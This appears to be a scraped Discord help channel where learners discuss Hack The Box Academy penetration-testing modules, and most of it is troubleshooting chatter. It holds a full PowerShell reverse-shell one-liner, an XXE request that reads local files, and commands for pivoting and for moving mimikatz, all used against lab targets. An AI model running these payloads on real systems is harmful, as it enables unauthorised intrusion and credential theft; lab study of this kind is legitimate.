#modules

1 messages Ā· Page 200 of 1

median gale
#

Am i missing something ?

patent niche
#

Got it usint [grep] and filtering 'L' words šŸ™‚ @storm stratus

median gale
# median gale

I know there is a typo but i thought it was wierd for the flag to be HBT and not HTB

soft cedar
#

Try and run powershell as administrator

rustic sage
#

im just wondering if anyone has similar results

#

on - common services- easy lab- some people say that they found the user just using nmap. Can someone show me a PoC

rotund steppe
#

Anyone else have issues with the academy dashboard not updating progress for the past few days? I've completed a couple module questions but neither the progress bar for the module or the percentage completed for the path has updated.

tidal kelp
#

it updates for me

rotund steppe
#

Hm, weird.

shut quest
rotund steppe
#

That was it, thanks.

wild storm
#

Hi, does anyone complete advanced csrf & xss skill assessment?
I have promoted to moderator, then I am looking for flag api endpoint.
but unfortunately there are no signs of finding one at all...
I would appreciate it if someone give me some hints.

Edit:
finally got flag... It was great module.

languid wharf
#

Hi, did anyone else face the problem with bloodhound when uploading of findings from sharphound it's stuck at 0 percent?

tranquil axle
#

so either upgrade your bloodhound or downgrade your sharphound

flat sedge
#

Compromise DC01 and submit the value of the flag file at C:\Users\Administrator\Desktop\flag.txt
Hello to everyone,
I am stuck on the last exercise of the ADCS skills assessment. DEV01 has been compromised and the password of jimmy’s account too. But, I am not able to compromise DC01.

With this new credentials I found that this user belongs to a group that ā€œhas dangerous permissionsā€. But I am not able to execute the commands from the Linux machine.
I have read that @F4Zero has made this question before and I have searched on google for the error of "[*] Requesting certificate via RPC
[-] Failed to get dynamic TCP endpoint for CertSvc
[-] Got error: 'NoneType' object has no attribute 'request'
[-] Use -debug to print a stacktrace"
Could anyone give me a hint on how to continue?

languid wharf
tranquil axle
#

I had this problem a few times

languid wharf
#

Yep, it does say that for some reason, weird. How can I upgrade to bloodhound 5.x? I downloaded it using apt after updating all the repos and it still doesn't the right version it seems

tranquil axle
#

I ended up downgrading my sharphound so it would work with 4.x instead :X

languid wharf
#

Thanks! i'll give that a try, and in the worst case I would downgrade sharphound

high adder
#

Hello, am I the only one experiencing significant slowness with connections to different machines? The RDP is completely bugging, SSH as well, etc.

flat sedge
#

Has anyone online/available completed the ADCS module by chance? May I DM? Stuck on ESC11 and in the last question of the skills assessment

languid wharf
fathom pendant
high adder
#

Yes, it's the same

tranquil axle
flint chasm
#

Working through the Nmap module. The NSE page wants me to find a flag from one of the services using NSE.

I found the HTB{} flag but it’s not accepting it as the answer?

ruby whale
#

Tried removing spaces at the end?

flint chasm
#

No spaces anywhere

fathom pendant
fathom pendant
gaunt monolith
#

Dears I'm in PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP
I made all what I learn in this module but when tried to get RDP on jason machine this error occurred on proxifire
[02.15 07:28:33] mstsc.exe (4528) *64 - 172.16.6.155:3389 error : Could not connect to proxy 127.0.0.1(127.0.0.1):1080 - connection attempt failed with error 10061

fathom pendant
#

Or xfreerdp

ruby whale
#
  • I found giving password when promted useful for some windows machines
fathom pendant
#

So does remnina

#

No

#

Just ask your question, don't ask to ask

high adder
#

It has been exactly 5 minutes since I've been waiting for a response, and I still haven't received any reply.

fathom pendant
#

Then I'd say reread the module/sections

high adder
fathom pendant
ruby whale
high adder
fathom pendant
#

Other question: are you by any chance running the pwnbox at the same time?

patent oak
#

Guys you know when you RDP into a target and then you SSH from there. Paste doesn't seem to work and I just sort of accepted it. I am gonna lose my mind if I have to type out one more command by hand. There has to be a way pepehands

high adder
fathom pendant
patent oak
#

Oh my days, for real

buoyant void
fathom pendant
delicate kernel
patent oak
#

I switched to remina cause it kept dropping but I'll switch back

#

Thank you

high adder
fathom pendant
#

No

high adder
#

šŸ™ƒ

fathom pendant
#

At this point contact website support then

#

I'm not staff/support

patent oak
#

Oh lord! I just realised right click pastes in remina

#

What a silly sausage I am 🌭

high adder
# fathom pendant I'm not staff/support

It seems to be working for now, albeit with a lot of slowness.
I have another question, why does this command from the course not work on the box even after disabling Windows' antivirus?
I run nc -lvnp 443 on my machine, then executed this command on Windows VM to get a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<my-tun-ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I get an output with only errors.

fathom pendant
high adder
#

yes

fathom pendant
#

Gotta make sure, you didn't include the brackets either yeah?

high adder
#

no i use like this '1.1.1.1'

fathom pendant
#

Try using a powershell one from revshells site

high adder
high adder
tame hazel
#

Hi, I'm a complete beginner when it comes to hacking or web exploitation. I was looking at the bug bounty path and was wondering how anyone's experience with it was? Were you able to get into bug bounties straight after doing the course and exam or is it atleast a very good starting point

patent oak
#

Would someone be so kind as to assist me here please. I've spent hours on the last flag of PTT in Linux. It's supposed to be in share \DC01\linux01 and they give you a snippet of it. Presumably to search. Without giving too much away, I've utilised the description and tried different ways of it but never get a result other than the flag that I don't need. I looked for a hint and someone said to get in the same way as the Julio flag in the same sort of location. I just don't understand how to impersonate linux01 I guess. I've got root on linux01 machine. And about half a brain cell left. HYPERLUL

#

It's the passwords module btw

#

If this problem statement is poor then let me know. I'm scared of spoiling it

onyx robin
#

Hi everybody! i'm stuck in Cmd vs Powershell module, in the last question of the skill assessment! i logged in as a user 10 and tried Get-WinEvent command, but i tried all the users i get, and everytime my answer is wrong!

cobalt trench
soft cedar
patent oak
#

Ah yes I bet I never tried that. I got lost. Thanks I'll let you know how I get on

final kite
#

Can someone help me with burpsuite proxy problem

onyx robin
modest grove
#

oops

cedar void
patent oak
cobalt trench
patent oak
#

It's the last one of the non bonus questions

#

I'm just gonna try a kt from the user that got me root

cobalt trench
#

Finishing up this module too. If I find it Ill give you a hand

patent oak
#

Maybe I lost track of what I've tried

#

Okay that wasn't it sadglas

soft cedar
#

did you find the find the keytab files?

patent oak
#

I believe so, I have some hashes now and the service principal seems to be LINUX01

#

Hopefully I'm on the right track

cobalt trench
patent oak
hollow thunder
#

is there still connectivity issues

cobalt trench
cobalt trench
hollow thunder
#

yea well there was connectivity issues yesterday and still have an issue periodic connectivity with the labs

#

idk if anyone else is expereincing it

cobalt trench
cobalt trench
hollow thunder
#

alright coulda just been a hickup today

cobalt trench
hollow thunder
#

ah, for a particular part im on i have to ssh to one of the machines, and that machine would go unresponsive for like 5 minutes then let me type again

#

none of it on the pwn box

soft cedar
cobalt trench
patent oak
#

Thanks for your help!

buoyant void
#

This is more of a general question I've had during the AD Enumeration & Attacks module, but most of the time the modules have gotten us to RDP into hosts to locate flags, the last two questions have just left it vague and told us to retrieve the flags in a certain area. What's the most efficient way to explore the directory of a compromised Windows host/user? I used psexec.py but I was wondering what else you could use to just get a shell and explore the directories

wicked cloak
#

I want to switch to this field, can someone with experience give me suggestions?

ember coral
#

Is anyone able to provide some insight on Q3 for Web Server Pivoting with Rpivot. "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." I've got my pivot set up and see 2 machines . Both have port 80 open but both are default apache pages. Not sure where i'm supposed to grab the flag from.

placid edge
#

Anyone i can dm for "AD Enumeration & Attacks - Skills Assessment Part II"

#

im stuck. i have all the users, + a valid cred. but cant seem to be able to get to a shell

steady mulch
#

what do i start with

placid edge
#

after the cleartext password

#

Submit the contents of the C:\flag.txt file on MS01.

#

there isnt rdp,winrm,psexec or anything it seems like

sterile epoch
#

what are you trying?

sterile epoch
placid edge
#

i mean, i ran a intensive nmap scan on it

#

might have been very tired

sterile epoch
placid edge
#

dont tell me its on a different port

sterile epoch
#

nah

#

all defaults

placid edge
#

but than xfreerdp should default to the rdp port

#

if that is what you are talking about tho

sterile epoch
#

I am on the same section just a few steps ahead

placid edge
#

nice, i think the rest should be fair enough i just cant get the shell so

#

been stuck on that for a little time

sterile epoch
#

do a double check do not do intensive

#

just the barebones will be fine

placid edge
#

oh wait

#

i am guessing this is a ||mssql||

sterile epoch
#

do you know how to set up a reverse shell with meterpreter on reverse shell

placid edge
#

just ligolo-ng

sterile epoch
#

I did

#

but my listener is dying

placid edge
#

ah

#

is it more stable on nc?

sterile epoch
#

its a windows victim

placid edge
#

ye, but that wouldnt matter.

sterile epoch
#

dunno how to set up on cmd

#

should I send nc.exe

placid edge
#

just use a powershell shell and set up nc on your attack host

#

and use ligolo to route it to you

ocean night
#

That's a T2 module if it's for the one mentioned above

placid edge
ocean night
#

Please keep spoilers for modules > T0 out of public chat.

sterile epoch
ocean night
#

Fair, sorry then. My eyes glanced over it and I acted.

#

Poor tired eyes.

placid edge
#

i feel yah

#

just got off a plane and just wanna sleep. But my covers are in the dryer

sterile epoch
#

but any help on the meterpreter shell?

placid edge
#

i told you

sterile epoch
#

why is it dying?

placid edge
#

most likely because the connection is poor. Setup double pivioting and this issue will be no more

sterile epoch
#

how do I do that?

placid edge
#

wait are you on the host?

#

how many networks deep are you?

sterile epoch
#

just a single hop

placid edge
#

ok, then it should be fine

sterile epoch
#

still its dying

#

i put the hop address in lhost

#

and forward the port in ligolo

placid edge
#

run this command in ligolo-ng

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

And send the reverse shell too the victim you are on on port 11601

#

and setup a local nc on 11601 on your attacker machine

next bronze
buoyant void
next bronze
placid edge
#

whats the difference between netexec and psexec?

I am guessing that psexec is based on powershell and netexec uses some "net" thing?

next bronze
sterile epoch
#

I never get the chance to use meterpreter so I think that I am missing on something big thats y I try to use it

fathom pendant
buoyant void
next bronze
sterile epoch
placid edge
#

oh yeah i've heard about this. Cool

next bronze
#

the wiki coverts pretty much everything and it's all you need, htba has a cme module but it slightly outdated

fathom pendant
#

Netexec is literally cme, but better

sterile epoch
#

oh ok then I will try to use it from now

buoyant void
fathom pendant
#

There's a whole thing with the creator and the contributing devs that resulted in the devs forking and basically making their own tool

buoyant void
#

Their Wiki is pretty in-depth too which I always appreciate, gonna try to use netexec as much as possible during the AD assessment

dreamy solar
fathom pendant
ember coral
lone pendant
#

what am I suppossed to input on the Skill Assessment first task of Assembly , its been week since I have been trying to solve this,

lone pendant
#

I tried that

#

I copy pasted the decoded values from the stack

#

it still did not work

#

should I copy it from bottom to top?

next bronze
#

if you copied it from the stack then it's wrong, the xor'd value is in rdx , step through the instructions and copy after it's been xor'd

lone pendant
#

I copied it after its been xor'd

#

nvm I got it

frozen mesa
#

WEB ATTACKS --> skill assesment --> got the admin password reset, accessed the admin login, event calender added, should XXE the adding of an event but i cant get flag.php

Anyone a nudge?

#

HTTP request:
|| POST /addEvent.php HTTP/1.1
Host: 94.237.62.195:32407
Content-Length: 214
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: http://94.237.62.195:32407
Referer: http://94.237.62.195:32407/event.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=icat5lf3fp9qf36sqjev41da30; uid=52
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///flag.php">
]>
<root>
<name>
&company;</name>
<details>&company;</details>
<date>3303-12-31</date>
</root>
||

Can read systemfiles but cant find flag.php

acoustic owl
fathom pendant
#

Here's a hot tip, wrap multi-line code in ``` makes it far easier to read

dreamy solar
fathom pendant
#

options

frozen mesa
#

Thanks! I was looking for flag.php instead of /flag.php

ember coral
#

i swear i tried that + put HTB{ } around it and said invalid both times...

mint lodge
#

i really new help with this question:
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
here:
https://academy.hackthebox.com/module/136/section/1291
i dont understand how am i suppose to get the dir for the uploads from upload.php source

sterile epoch
#

Hi guys I am stuck on
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host
I have system on sql01 mimikatz cannot dcsync any hints?

#

I have 9 mins left please

drifting urchin
#

Do you guys try to memorise commands? Or whenever you are trying to exploit something, you just look at your notes, google ..etc? Should I feel bad that I constantly need to check my notes regarding which command to use and how

sterile epoch
#

thats what I do. but the problem is I get stuck a lot

remote latch
#

i thought this for coding in general but after making program with 2k lines of code i just knew it all

#

its all up to knowledge and practice

#

if you miss 1 of them, be sure ur fucked

#

so its better to be 50/50 both

sterile epoch
#

my pwnbox expired now I feel sad

onyx dust
#

;[

sterile epoch
#

i am still stuck

#

they reduced the time for pwnbox I guess

onyx dust
#

cant u keep pressing extend for 6 hrs

remote latch
mint lodge
sterile epoch
#

yes before it was 6hrs

mint lodge
#

šŸ˜…

remote latch
mint lodge
#

i tried i dont really know what to ask tbh

sterile epoch
#

now not even 4 only target can spawn for 6hrs

remote latch
remote latch
#

i feel way more comfortable on kali that pwnbox

sterile epoch
remote latch
onyx dust
remote latch
#

today i realised that i was trying to solve a challenge that i already solved and was trying to do it for 3 straight days

tranquil axle
remote latch
sterile epoch
#

it worked

onyx dust
#

i'm not a pro hacker i am a noob

next bronze
#

pretty much make it a part of your standard post exploit routine

remote latch
onyx dust
#

idc about my rank i just play on the weekends

remote latch
#

cuz i was talking with another pro hacker when asking him for help after one of the challenges shattered my system and had to re install windows

onyx dust
#

the weekend boxes have no writeups so it's more fun

#

when everyone is clueless

remote latch
onyx dust
#

yeah right u should've seen me doing thick client applications module

remote latch
#

i legit couldn't boot up my pc, like i was on the repair screen

#

had to do PC reset

next bronze
#

now you know whatcanisay

remote latch
#

ig so

winged peak
winged peak
#

I tried with different wordlist without succees

soft cedar
next bronze
acoustic owl
fathom pendant
mint lodge
winged peak
fathom pendant
#

but anyway

#

the answer is gonna be in the format of subdomainB.subdomainA.inlanefreight.htb

#

i'd suggest starting with a zone transfer to start narrowing your search

midnight coyote
#

Canonical studies

winged peak
fathom pendant
#

:P

winged peak
#

ok thanks

fathom pendant
#

but also zone transfer: don't rely on the wordlist until after starting with a basic zone transfer

#

because you can and will miss the important subdomain it's under

short trellis
#

Hello need some help please with Footprinting hard assessment - I have the snmp string in the brackets but at a lost of what to do next. NMAP was completed for TCP and UDP ports. not sure what to do after running 161.

fathom pendant
patent oak
#

@soft cedar Thanks for the hint! I got there in the end. sumE

short trellis
fathom pendant
#

np

crystal steeple
#

im on skills assessement of shells and payloads section

#

and when i run the exploit ms17-010 on host 3 it wont create a session

next bronze
#

is your lhost and lport right

soft cedar
#

^

crystal steeple
#

well the lhost is basically the attacker IP so 100% right

next bronze
#

that's not right

crystal steeple
#

oh

next bronze
#

check subnets

gloomy sigil
#

Hi! I need help on "Windows Privilege Escalation Skills Assessment - Part I" in the question "Find the password for the ldapadmin account somewhere on the system." This is the second question but I wasn't able to solve before escalating privilege (which was supposed to happen after getting the answer for the second question).
After becoming SYSTEM I was able to find the file with the ldapadmin password using the command "||findstr /SI /M "ldapadmin" *.xml *.ini *.txt||" . My question is: how was I suppose to get ldapadmin password before escalating privilege to SYSTEM?

fathom pendant
#

<@&861185840277487616>

tough kindle
#

ello

crystal steeple
#

thank you :3

winter bough
#

hello everyone

#

I just started, created acc and want to start learning, would you suggest me go into academy section or hacker section?

#

I saw both have different pricing that“s why I“m asking

onyx dust
#

if starting point from the hacker section is too hard try the academy. it depends where you're at on computers already prior to trying either.

agile torrent
#

both have free options, i'd say dip your toes in starting point (labs) and getting started path (academy) and see which one you like best

onyx dust
#

if you're absolute starter i suggest the academy so u can develop a methodology and communicate using terms that everyone knows.

winter bough
#

I“m beginner into hacking and security things, so propably academy should be better

onyx dust
#

yeah it's good.

winter bough
#

are you also using in academy virtual machines for teaching?

onyx dust
#

for teaching? no

#

i'm auditing it so i can tell people to try it or not

winter bough
#

Because I saw on myself that when I“m learning something with using virtual machines it helps me more because I see on my own eyes how it works etc if you understand me

sterile epoch
#

whats the best way to upload files from windows using powershell. I normally use rdp, smb, etc but those are not availabe now. I tried to use uploadserver I get 400 error Invoke-WebRequest -Uri http://172.16.7.240:5555/upload -Method POST -InFile C:\Users\Public\sam.save

winter bough
onyx dust
#

they have a browser computer you can use called the pwnbox that's a vm u dont have to configure or maintain

sterile epoch
onyx dust
#

you can use impacket-smbserver ?

#

rdp with /drive:x,.

#

then u can use the unc path like, //tsclient/x

sterile epoch
#

yes but I know about those but I wanna do it the easy way

#

using http methods

onyx dust
#

use powershell to base64 encode the file then copy and paste it then

sterile epoch
#

sam files are long

onyx dust
#

it's so easy tho

winter bough
#

if we are talking about academy billing, which one you suggest? not sure if "+200" cubes per month is enough or nope

acoustic owl
sterile epoch
crystal steeple
#

bro how do you navigate in that rdp panel in shells and payloads skills assessement?:(

sterile epoch
#

its a nightmare to copy

onyx dust
#

Winter do everything for free b4 u spend a dime. See if the content is right for you. Starting point is free and there's tier 0 modules that r free too

winter bough
tranquil axle
onyx dust
#

a worse quality version of the academy that's free exists on tryhackme.com but it's worse by farrrr

#

it's free though just leaves a lot to be desired and you'll find youself googling a lot

next bronze
sterile epoch
#

ok

sterile epoch
onyx dust
winter bough
sterile epoch
#

found it

onyx dust
#

that's what i do

winter bough
#

ala carte?

onyx dust
#

yeah just pick what you like or wanna do/learn about

winter bough
#

oh okey

#

but I saw I have just "60 cubes"

#

how do I use them? for what?

onyx dust
#

i'm doing all the modules tho :x

winter bough
#

can I find it somewhere how I use them?

winter bough
next bronze
onyx dust
#

yeah the cubes unlock them and the subscription model gets you cubes. normally for ala cart is 100 cubes for 10$

next bronze
#

tier 0 are free ie you get the 10 cubes back after you've completed them

onyx dust
#

winter do all the tier 0 ones see if u like the style b4 u buy it

winter bough
#

I now understand what are you talking about šŸ˜„

#

Okey, thank you for now

next bronze
#

don't buy cubes ala carte lol, it's a big waste of money compared to the monthly subs

fathom pendant
winter bough
fathom pendant
#

you can use the in-browser virtual machine for all academy content (in-fact all academy content is verifiably doable with it)

winter bough
fathom pendant
#

it's preffered for most people to set up their own (and there is a setting up module)

crystal steeple
#

how do i navigate to website in rdp in shells and payloads live engagement?

#

i can't find any browser

next bronze
onyx dust
#

yeah use an edu email

fathom pendant
tranquil axle
fathom pendant
next bronze
tranquil axle
#

did assembly already, that one was fun.

onyx dust
#

i have the game hacking one

indigo locust
#

PASSWORD ATTACKS >>> Protected Archives >>> Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

In above question, I'm able to locate Notes.zip file and copy it to my attack machine, then get the hash, and finally use john to crack the hash using the mutated password list given in the module. But the cracked hash Im getting, seems to be not accepted as answer in that specific section. Can someone assist?

sterile epoch
#

it works like butter

next bronze
remote latch
#

are there legit people that look at hard machines and are like damn, thats so easy, like how to know if i can make it into cybersecurity

cedar void
#

I am trying to transfer my mimikatz.exe file from my linux attack machine to the windows machine that I reverse shelled into and I am not sure how to use the smb share transfer method
sudo impacket-smbserver share -smb2support /tmp/smbshare

tranquil axle
crystal steeple
tranquil axle
next bronze
fathom pendant
tranquil axle
#

ah yea was thinking of ldap then

fathom pendant
#

HTB{..}

fathom pendant
#

MANY people looked over it (myself included)

onyx dust
#

i did powerview. it's pretty good. i didnt think ldap was too bad either.

#

i use gc for cubes so

tranquil axle
#

gc?

onyx dust
#

gift cards.

winter bough
#

0 / 1 spawns left 🄲

sterile epoch
#

I am at 300 cubes

mint lodge
onyx dust
#

i dont have any of the newly released ones done yet i'm still catching up on the soc one then i'll do them.

winter bough
#

maybe I will hop into the "Silver" just as a try for this month

onyx dust
#

the soc one is new to me and cpts too. i did just cbbh when it came out.

mint lodge
tranquil axle
winter bough
#

isn“t better to have it from them?

onyx dust
#

its better to learn how to use on your own

winter bough
#

are you using own vm or their?

fathom pendant
#

most people use their own

#

instead of the browser one

winter bough
#

is there some + or -? instahead of paying

fathom pendant
#

?

onyx dust
#

i use the browser one it's good if u dont want to use your own and already know how to set it up

fathom pendant
onyx dust
#

extending lifetime of vm

fathom pendant
#

if you use your own vm you don't have to worry about lifetimes

onyx dust
#

instance

fathom pendant
#

i mean yeah; but you don't need a sub for that

winter bough
#

and If something is "Silver" enough?

fathom pendant
#

Silver monthly?

winter bough
#

yes

fathom pendant
#

Silver monthly is fine

#

ĀÆ_(惄)_/ĀÆ

winter bough
#

I probably don“t need "Gold"

#

when I“m just starting

fathom pendant
#

it just depends on the pace you're going

#

also the information Security Fundamentals path is decent for beginners

winter bough
#

is there any "Coupon Code"?

#

just asking

ocean night
#

No, but keep an eye on our social channels. We do giveaways now and again.

winter bough
#

bruh, it“s waste of time

indigo locust
#

and then got separate hash file to crack the hash

fathom pendant
#

you cracked the password for the zip file

tough kindle
#

Can someone help me in the Nessus Skills Assessment?
I know it sounds easy, but the Nessus scan result doesn't show the accessible SMB shares.
I'm stumped I need help

fathom pendant
next bronze
onyx dust
#

adcs is more fun in practice

#

irl

sterile epoch
tough kindle
tranquil axle
#

Going through zephyr rn and having a good time and maybe I’ll get stuck and can gain new knowledge

next bronze
fathom pendant
#

:P it sounds dumb

next bronze
#

I helped a few people with adcs when they haven't done kerberos attacks and it's painful to say the least

sterile epoch
#

oh then kerberos it is do you have any other tier 3 module in mind to do before cuz I guess I will get only one unlock for free

fathom pendant
#

but the Nessus pre-populated results should have everything and the preceding sections regarding using Nessus should be enough

tough kindle
cedar void
fathom pendant
tranquil axle
#

The crackmapexec module content looked juicy, it was really nice working with netexec in zephyr so far

ember coral
#

Any advice on where im going wrong here? its showing a write error but i'm not attempting to right anywhere just open a CMD

fathom pendant
next bronze
fathom pendant
# tough kindle

it's been a minute since i've done it but the sections detailing how to use nessus should be enough to figure it out

indigo locust
next bronze
tranquil axle
#

Mmm relay

fathom pendant
tranquil axle
#

Maybe I’ll just sub for some more cubes and just do all 5 lol

fathom pendant
#

where do you have the share running?

next bronze
tranquil axle
#

Time to stack up on CPTS2 modules

cedar void
tough kindle
fathom pendant
#

the sharename is "share" given by the command, and the location you actually shared is "/tmp/smbshare"

#

which has 0 links to the current directory/file you're attempting to share

#

(unless you symlink it)

cedar void
fathom pendant
#

...

#

look where you're running the share

#

it's in the pwnbox

#

how would you creating a share on the pwnbox, create one on the target?

#

the share running on YOUR system is mapped to the /tmp/smbshare directory on your sytem

wanton idol
#

Hey guys, im doing WINDOWS PRIVILEGE ESCALATION section SeTakeOwnershipPrivilege, I want to know if im suppose to find a user that has SeTakeOwnershipPrivilege or the user hackthebox provided to rdp as would have the SeTakeOwnershipPrivilege. as the user they provided does not have SeTakeOwnershipPrivilege

next bronze
#

run as admin

ruby shadow
#

Hey, im doing thw windows event logging basics and im stuck " Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer."

winter bough
#

I decision to hop into the silver subscription, since im using 2 devices and changing between them, saving time by doing vm 2 times

wanton idol
winter bough
fathom pendant
#

ĀÆ_(惄)_/ĀÆ

winter bough
ember coral
#

going through the pivoting course, im currious is there a reason you would need to use tools like chisel instead of just using ligolo-ng? or is it just personal prefrence. I noticed neither HTB academy / offsec / TCM talk about the use of ligolo but its so easy

tranquil axle
#

ligolo-ng is pretty new and you are learning some of the old methods

#

You should know how and why they work

ember coral
tranquil axle
#

Chisel for example can be used to expose the port of a internal server to you, not sure how you’d do that with ligolo

next bronze
#

not until the most recent update couple of weeks ago

#

also ligolo can't forward smb traffic, and ssh pivoting is simpler in the sense you don't have to drop a binary onto the host

ember coral
next bronze
#

yes, there are times where you need to access a port that's only open on localhost, for example

ember coral
next bronze
#

it's also good to learn how the tools work behind the scenes before moving to something that does it automatically

tranquil axle
#

Ligolo is my goto, too, but sometimes you may need some of the others. And yes, it’s important to try and understand why

cedar void
fathom pendant
#

replace /tmp/smbshare with /usr/share/mimikatz/Win32

#

syntax being smbserver {sharename} {options} {filepath_on_system}

graceful forge
#

sirs, somebody can help me please? when i try to boot my .ovpn archive on kali the terminal break in this position of running:

2024-02-15 21:27:47 Timers: ping 10, ping-restart 120
2024-02-15 21:27:47 Protocol options: explicit-exit-notify 1

next bronze
#

it's not broken, openvpn needs to be running for the connection, just open another terminal

graceful forge
#

it's just open another terminal and run the command again?

next bronze
#

no, you're already connected, leave the openvpn instance in the background and do other things

onyx dust
#

put the &

graceful forge
#

tks mr.s

but i'm having another problem to start the service, following the same:

"Error!
You must stop your active machine before spawning another one."

this error happens when i click on the button "Spawn Machine". Can you help me please?

#

i saw the message and i don't have 2 machines booted at the same time for now

graceful forge
#

anonuserExe

#

i'm begginer sirs, i'm so sorry

next bronze
#

goblin with the instant tech support POGGERS

ocean night
#

Please try again @graceful forge

graceful forge
#

ok @ocean night

next bronze
graceful forge
#

i got it guys

ocean night
#

Great

graceful forge
#

tks @next bronze and @ocean night

ocean night
#

You're welcome

fathom pendant
#

meaning it's running

graceful forge
#

yeaaah @fathom pendant, i saw this, but tks for the message!

fathom pendant
#

I prefer not to daemonise (putting & at the end) so I can quick kill the VPN if I need to switch due to performance issues

graceful forge
#

mmm that's ok, i got it

#

tks for your great support!

severe arrow
#

Hey yall I can not find the password for the support users on broken authentication. Do the users change every reset? My password list is 50 total lines long. I read the write up to the part Im on and I seem to be doing things correctly any advice?

fathom pendant
#

is your fail string correct?

#

or are you sure you've got the right thing

#

also there shouldn't be a writeup for this module as it's tier 2

#

only tier 0 modules are allowed writeups

severe arrow
#

Failure Sring is "Invalid credentials" and time out is "Too many login failures"

fathom pendant
#

by writeup do you mean the section content?

severe arrow
#

Nah fam some medium article

fathom pendant
#

send link?

severe arrow
#

Ill DM you

fathom pendant
severe arrow
#

ToS?

fathom pendant
#

yes: writeups are disallowed and break ToS for academy content

#

any writeup for content above tier 0 is explicitly not allowed lol

#

especially for skill assessments, which should be testing your knowledge regarding the content you've read up until that point

#

:P

cobalt trench
#

Nice

severe arrow
#

Awe nah

heavy marsh
#

So I'm on question 7 of AD Skills Assessment 2 and have an sql shell, but I'm not sure where to go from here. None of the cmd reverse shells are working with my netcat listener. Here is the output of the whoami /priv

severe arrow
#

My b'

next bronze
ocean night
#

Thanks @fathom pendant - identified and banned.

heavy marsh
next bronze
#

not sure? check your notes

severe arrow
#

Yo did I just get banned?

ocean night
#

Are you the author of that spoiler?

severe arrow
#

Nope

ocean night
#

Then no

severe arrow
#

Oh well thats a relief

heavy marsh
next bronze
#

I'm asking what can you do with those privileges

#

and did you set up the pivots correctly

heavy marsh
#

Can we impersonate another user?

#

There are really no pivots so far

heavy marsh
fathom pendant
#

no wonder trying to follow it led nowhere for them :/

heavy marsh
#

The "Moving On" section of the module doesn't give much to move on with, haha.

fathom pendant
#

It's not really much

#

also the mssql section of attacking common services really went over impersonation

heavy marsh
#

Not there

heavy marsh
#

So confused!!!

#

Taking a break, if anyone has some insight please DM me in the meantime.

fathom pendant
#

ĀÆ_(惄)_/ĀÆ

heavy marsh
fathom pendant
#

it's not in common services but it is a common vulnerability

heavy marsh
fathom pendant
#

ĀÆ_(惄)_/ĀÆ

next bronze
#

printspoofer is mentioned in the module

next bronze
fathom pendant
#

yes

#

i'm just referring to something they said earlier regarding impersonation with the Common Services module comment

buoyant void
#

Can someone give me a hint on AD Skills Assessment 1, I feel like I'm missing something really basic but I'm starting to get frustrated. I don't know how much I can say but I'm still stuck on the first machine, got a rev shell, found the SPN mentioned in the second question but I don't know how to retrieve the ticket without any tools. I uploaded Mimikatz to the machine but I can't run it from this rev shell so I'm stuck

next bronze
#

upload tools that can help you kerberoast

buoyant void
#

That's why I uploaded Mimikatz so I can extract the ticket from memory, but unable to run it from the rev shell apparently since I'm getting no output

next bronze
#

mimikatz doesn't kerberoast

severe arrow
buoyant void
# next bronze mimikatz doesn't kerberoast

No not directly, but it can be used to extract the ticket from memory. thought it would be simpler than compiling and uploading the more automated tool. But I'll give it a shot, I just don't know why that would run when mimikatz won't right now

next bronze
#

extracting tickets from memory is different from kerberoasting, you still need to request the ticket first

severe arrow
buoyant void
cobalt trench
#

Finally tackling the password labs HERE WE GO

buoyant void
next bronze
#

are you running it in the webshell?

fathom pendant
#

usually mimikatz spawns another window

#

if you're trying to do some command shenanigans

buoyant void
buoyant void
fathom pendant
#

mimikatz isn't too friendly on non-ui shells

next bronze
buoyant void
next bronze
#

that's only if you pth or something, it's alwways inline on start

fathom pendant
#

ye

#

mimikatz is neat though

next bronze
buoyant void
#

Ah okay I'm gonna write this down thanks I appreciate it

storm hedge
#

Hello, I have a question about lateral movement.
In a pentest, the pentester accessed host-c from host-a based on credentials collected from host-b , is that a lateral movement from host-a to host-c or from host-b to host-c?

ocean night
#

@graceful forge check out #welcome and #rules . I do not know anyone that can help you evolve in infosec, only yourself. Read the rules, and please abide by them.

heavy marsh
#

why do I have to use git clone to download a .exe for PrintSpoofer?! I downloaded the zip and there was no exe. Now I used git clone based on a writeup using the tool and git clone spits out a file with an exe. I don't get it.

#

Oh, nevermind, they're in releases

heavy marsh
#

I don't understand why the PrintSpoofer was the key to the SQL01 machine, how was I supposed to know that without getting a hint online?!

fathom pendant
#

just fucking around and finding out ĀÆ_(惄)_/ĀÆ

heavy marsh
#

It's discouraging, would have taken me forever to figure that out

fathom pendant
#

likely something in the enumeration phase would have revealed it

next bronze
#

bro it says it right there, seimpersonate

heavy marsh
#

It's not the end of the world, but I'm worried about the exam

next bronze
#

you even sent a screenshot

heavy marsh
#

There's no writeup or discord on the exam. I'm just hoping that it's not as specific because I feel like I could be searching for days for some small detail.

next bronze
fathom pendant
#

my brother in christ

#

It's likely talked about in the module that SeImpersonate = try printspoofer

fathom pendant
heavy marsh
#

